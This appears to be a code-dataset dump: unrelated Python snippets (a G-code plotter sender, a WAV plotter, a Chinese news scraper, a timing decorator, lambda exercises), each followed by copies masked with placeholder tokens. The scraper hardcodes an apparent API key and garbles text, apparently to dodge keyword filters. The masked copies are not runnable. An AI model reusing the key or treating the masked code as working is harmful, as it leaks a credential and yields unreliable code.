self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n <function token>\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n <function token>\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n <function token>\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<assignment token>\n<class token>\n" ]
false
49
c105f06e302740e9b7be100df905852bb5610a2c
import matplotlib matplotlib.use('TkAgg') import matplotlib.pyplot as plt import numpy as np import struct import wave scale = 0.01 wav = wave.open('output.wav', 'r') print 'channels %d'%wav.getnchannels() print 'smpl width %d'%wav.getsampwidth() print 'frame rate %f'%wav.getframerate() nframes = wav.getnframes() print 'frames %d'%nframes data = wav.readframes(nframes) data = scale * np.array(struct.unpack('<%dh'%nframes, data)) / float((1 << 14)) plt.plot(data) plt.show()
[ "import matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport struct\nimport wave\n\nscale = 0.01\nwav = wave.open('output.wav', 'r')\n\nprint 'channels %d'%wav.getnchannels()\nprint 'smpl width %d'%wav.getsampwidth()\nprint 'frame rate %f'%wav.getframerate()\nnframes = wav.getnframes()\nprint 'frames %d'%nframes\n\ndata = wav.readframes(nframes)\n\ndata = scale * np.array(struct.unpack('<%dh'%nframes, data)) / float((1 << 14))\n\nplt.plot(data)\nplt.show()\n" ]
true
50
e1d0648825695584d3ea518db961a9178ea0c66a
import requests import sxtwl import datetime from datetime import date import lxml from lxml import etree # 日历中文索引 ymc = [u"十一", u"十二", u"正", u"二", u"三", u"四", u"五", u"六", u"七", u"八", u"九", u"十"] rmc = [u"初一", u"初二", u"初三", u"初四", u"初五", u"初六", u"初七", u"初八", u"初九", u"初十", \ u"十一", u"十二", u"十三", u"十四", u"十五", u"十六", u"十七", u"十八", u"十九", \ u"二十", u"廿一", u"廿二", u"廿三", u"廿四", u"廿五", u"廿六", u"廿七", u"廿八", u"廿九", u"三十", u"卅一"] # 日历库实例化 lunar = sxtwl.Lunar() # 2.阳历转阴历 def china_lunar(): today = str(date.today()) today_list = today.split('-') # ['2019', '08', '08'] lunar_day = lunar.getDayBySolar((int)(datetime.datetime.now().year), (int)(datetime.datetime.now().month), (int)(datetime.datetime.now().day)) # 输入年月日 # 判断是否为润年 if (lunar_day.Lleap): china_day = "农历:{0}月{1}".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi]) else: china_day ="农历:{0}月{1}".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi]) return today,china_day import json def morning_news(): news_api = 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2' response = requests.get(news_api) print(dict(response.json())) news_list = dict(response.json()) news = '' m = 1 news_q='' for i in news_list['newslist']: img_url='' if i['url'] == '': img_url = i['imgsrc'] news = str(str(m)+":"+i['title']+"\n"+i['url']+img_url+"\n") news_q += str(news) m += 1 return news_q def news_put(): news_spider_message = '【早间新闻】 '+china_lunar()[0]+" "+china_lunar()[1]+"\n"+morning_news() return news_spider_message headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'} def NewYork_news(page=1): society = 'https://cn.nytimes.com/society/{}/'.format(page) response = requests.get(url=society,headers =headers ) mytree = lxml.etree.HTML(response.text) title = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a') news = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p') url = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href') # print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//h3/a')[1].text) #这个是标题 # print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//p')[1].text) # 这个是简介 # # print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//h3/a/@href')[1]) # 这个是链接 newss_1 = '' number = 1 for t in title: newss = str(number)+":"+str_list(t.text) +'。'+'\n'+' 概要:'+str_list(news[title.index(t)].text)+'。'+'\n'+' 详情:'+'\n'+'\n' newss_1 +=newss number += 1 return newss_1 def NewYork_news_put(page=0): news_spider_message = '【纽约时报中文网】'+china_lunar()[0]+" "+china_lunar()[1]+"\n"+NewYork_news(page) return news_spider_message def str_list(t): m='' for i in list(t): if i == '中': china = 'Z' m += china +'_' else: m += i + '_' return m
[ "import requests\nimport sxtwl\nimport datetime\nfrom datetime import date\nimport lxml\nfrom lxml import etree\n# 日历中文索引\nymc = [u\"十一\", u\"十二\", u\"正\", u\"二\", u\"三\", u\"四\", u\"五\", u\"六\", u\"七\", u\"八\", u\"九\", u\"十\"]\nrmc = [u\"初一\", u\"初二\", u\"初三\", u\"初四\", u\"初五\", u\"初六\", u\"初七\", u\"初八\", u\"初九\", u\"初十\", \\\n u\"十一\", u\"十二\", u\"十三\", u\"十四\", u\"十五\", u\"十六\", u\"十七\", u\"十八\", u\"十九\", \\\n u\"二十\", u\"廿一\", u\"廿二\", u\"廿三\", u\"廿四\", u\"廿五\", u\"廿六\", u\"廿七\", u\"廿八\", u\"廿九\", u\"三十\", u\"卅一\"]\n\n# 日历库实例化\nlunar = sxtwl.Lunar()\n\n\n\n# 2.阳历转阴历\n\n\ndef china_lunar():\n today = str(date.today())\n\n today_list = today.split('-') # ['2019', '08', '08']\n lunar_day = lunar.getDayBySolar((int)(datetime.datetime.now().year), (int)(datetime.datetime.now().month), (int)(datetime.datetime.now().day)) # 输入年月日\n # 判断是否为润年\n if (lunar_day.Lleap):\n china_day = \"农历:{0}月{1}\".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day =\"农历:{0}月{1}\".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today,china_day\n\n\nimport json\ndef morning_news():\n news_api = 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q=''\n for i in news_list['newslist']:\n img_url=''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m)+\":\"+i['title']+\"\\n\"+i['url']+img_url+\"\\n\")\n news_q += str(news)\n m += 1\n\n return news_q\n\ndef news_put():\n news_spider_message = '【早间新闻】 '+china_lunar()[0]+\" \"+china_lunar()[1]+\"\\n\"+morning_news()\n return news_spider_message\n\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'}\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society,headers =headers )\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n # print(mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div[2]/div/ul//h3/a')[1].text) #这个是标题\n # print(mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div[2]/div/ul//p')[1].text) # 这个是简介\n #\n # print(mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div[2]/div/ul//h3/a/@href')[1]) # 这个是链接\n newss_1 = ''\n number = 1\n for t in title:\n\n newss = str(number)+\":\"+str_list(t.text) +'。'+'\\n'+' 概要:'+str_list(news[title.index(t)].text)+'。'+'\\n'+' 详情:'+'\\n'+'\\n'\n newss_1 +=newss\n number += 1\n\n return newss_1\n\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】'+china_lunar()[0]+\" \"+china_lunar()[1]+\"\\n\"+NewYork_news(page)\n\n return news_spider_message\n\ndef str_list(t):\n m=''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china +'_'\n else:\n\n m += i + '_'\n\n\n return m\n", "import requests\nimport sxtwl\nimport datetime\nfrom datetime import date\nimport lxml\nfrom lxml import etree\nymc = [u'十一', u'十二', u'正', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九', u'十'\n ]\nrmc = [u'初一', u'初二', u'初三', u'初四', u'初五', u'初六', u'初七', u'初八', u'初九', u'初十',\n u'十一', u'十二', u'十三', u'十四', u'十五', u'十六', u'十七', u'十八', u'十九', u'二十',\n u'廿一', u'廿二', u'廿三', u'廿四', u'廿五', u'廿六', u'廿七', u'廿八', u'廿九', u'三十', u'卅一'\n ]\nlunar = sxtwl.Lunar()\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\nimport json\n\n\ndef morning_news():\n news_api = (\n 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n )\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q = ''\n for i in news_list['newslist']:\n img_url = ''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m) + ':' + i['title'] + '\\n' + i['url'] + img_url + '\\n'\n )\n news_q += str(news)\n m += 1\n return news_q\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n", "<import token>\nymc = [u'十一', u'十二', u'正', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九', u'十'\n ]\nrmc = [u'初一', u'初二', u'初三', u'初四', u'初五', u'初六', u'初七', u'初八', u'初九', u'初十',\n u'十一', u'十二', u'十三', u'十四', u'十五', u'十六', u'十七', u'十八', u'十九', u'二十',\n u'廿一', u'廿二', u'廿三', u'廿四', u'廿五', u'廿六', u'廿七', u'廿八', u'廿九', u'三十', u'卅一'\n ]\nlunar = sxtwl.Lunar()\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\n<import token>\n\n\ndef morning_news():\n news_api = (\n 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n )\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q = ''\n for i in news_list['newslist']:\n img_url = ''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m) + ':' + i['title'] + '\\n' + i['url'] + img_url + '\\n'\n )\n news_q += str(news)\n m += 1\n return news_q\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n", "<import token>\n<assignment token>\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\n<import token>\n\n\ndef morning_news():\n news_api = (\n 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n )\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q = ''\n for i in news_list['newslist']:\n img_url = ''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m) + ':' + i['title'] + '\\n' + i['url'] + img_url + '\\n'\n )\n news_q += str(news)\n m += 1\n return news_q\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<assignment token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n", "<import token>\n<assignment token>\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\n<import token>\n<function token>\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<assignment token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n", "<import token>\n<assignment token>\n<function token>\n<import token>\n<function token>\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<assignment token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n", "<import token>\n<assignment token>\n<function token>\n<import token>\n<function token>\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<assignment token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<import token>\n<function token>\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<assignment token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\n<function token>\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<import token>\n<function token>\n<function token>\n<assignment token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\n<function token>\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<import token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n" ]
false
51
2c39660da8fe839c4634cd73ce069acc7b1b29b4
import time # Decorator def measure_time_of_func(func): def wrapper_func(n): start_time = time.time() fib_seq = func(n) end_time = time.time() return (fib_seq, end_time - start_time) return wrapper_func # Returns a list with first n numbers of fibonacci sequence. @measure_time_of_func def fib(n): sequence = [1, 1] for i in range(2, n, 1): sequence.append(sequence[i - 1] + sequence[i - 2]) return sequence
[ "import time\n\n\n# Decorator\ndef measure_time_of_func(func):\n def wrapper_func(n):\n start_time = time.time()\n fib_seq = func(n)\n end_time = time.time()\n return (fib_seq, end_time - start_time)\n\n return wrapper_func\n\n\n# Returns a list with first n numbers of fibonacci sequence.\n@measure_time_of_func\ndef fib(n):\n sequence = [1, 1]\n for i in range(2, n, 1):\n sequence.append(sequence[i - 1] + sequence[i - 2])\n return sequence\n", "import time\n\n\ndef measure_time_of_func(func):\n\n def wrapper_func(n):\n start_time = time.time()\n fib_seq = func(n)\n end_time = time.time()\n return fib_seq, end_time - start_time\n return wrapper_func\n\n\n@measure_time_of_func\ndef fib(n):\n sequence = [1, 1]\n for i in range(2, n, 1):\n sequence.append(sequence[i - 1] + sequence[i - 2])\n return sequence\n", "<import token>\n\n\ndef measure_time_of_func(func):\n\n def wrapper_func(n):\n start_time = time.time()\n fib_seq = func(n)\n end_time = time.time()\n return fib_seq, end_time - start_time\n return wrapper_func\n\n\n@measure_time_of_func\ndef fib(n):\n sequence = [1, 1]\n for i in range(2, n, 1):\n sequence.append(sequence[i - 1] + sequence[i - 2])\n return sequence\n", "<import token>\n<function token>\n\n\n@measure_time_of_func\ndef fib(n):\n sequence = [1, 1]\n for i in range(2, n, 1):\n sequence.append(sequence[i - 1] + sequence[i - 2])\n return sequence\n", "<import token>\n<function token>\n<function token>\n" ]
false
52
c87e6f8780bf8d9097f200c7f2f0faf55beb480c
# 1 def transform_data(fn): print(fn(10)) # 2 transform_data(lambda data: data / 5) # 3 def transform_data2(fn, *args): for arg in args: print(fn(arg)) transform_data2(lambda data: data / 5, 10, 15, 22, 30) # 4 def transform_data2(fn, *args): for arg in args: print('Result: {:^20.2f}'.format(fn(arg))) transform_data2(lambda data: data / 5, 10, 15, 22, 30)
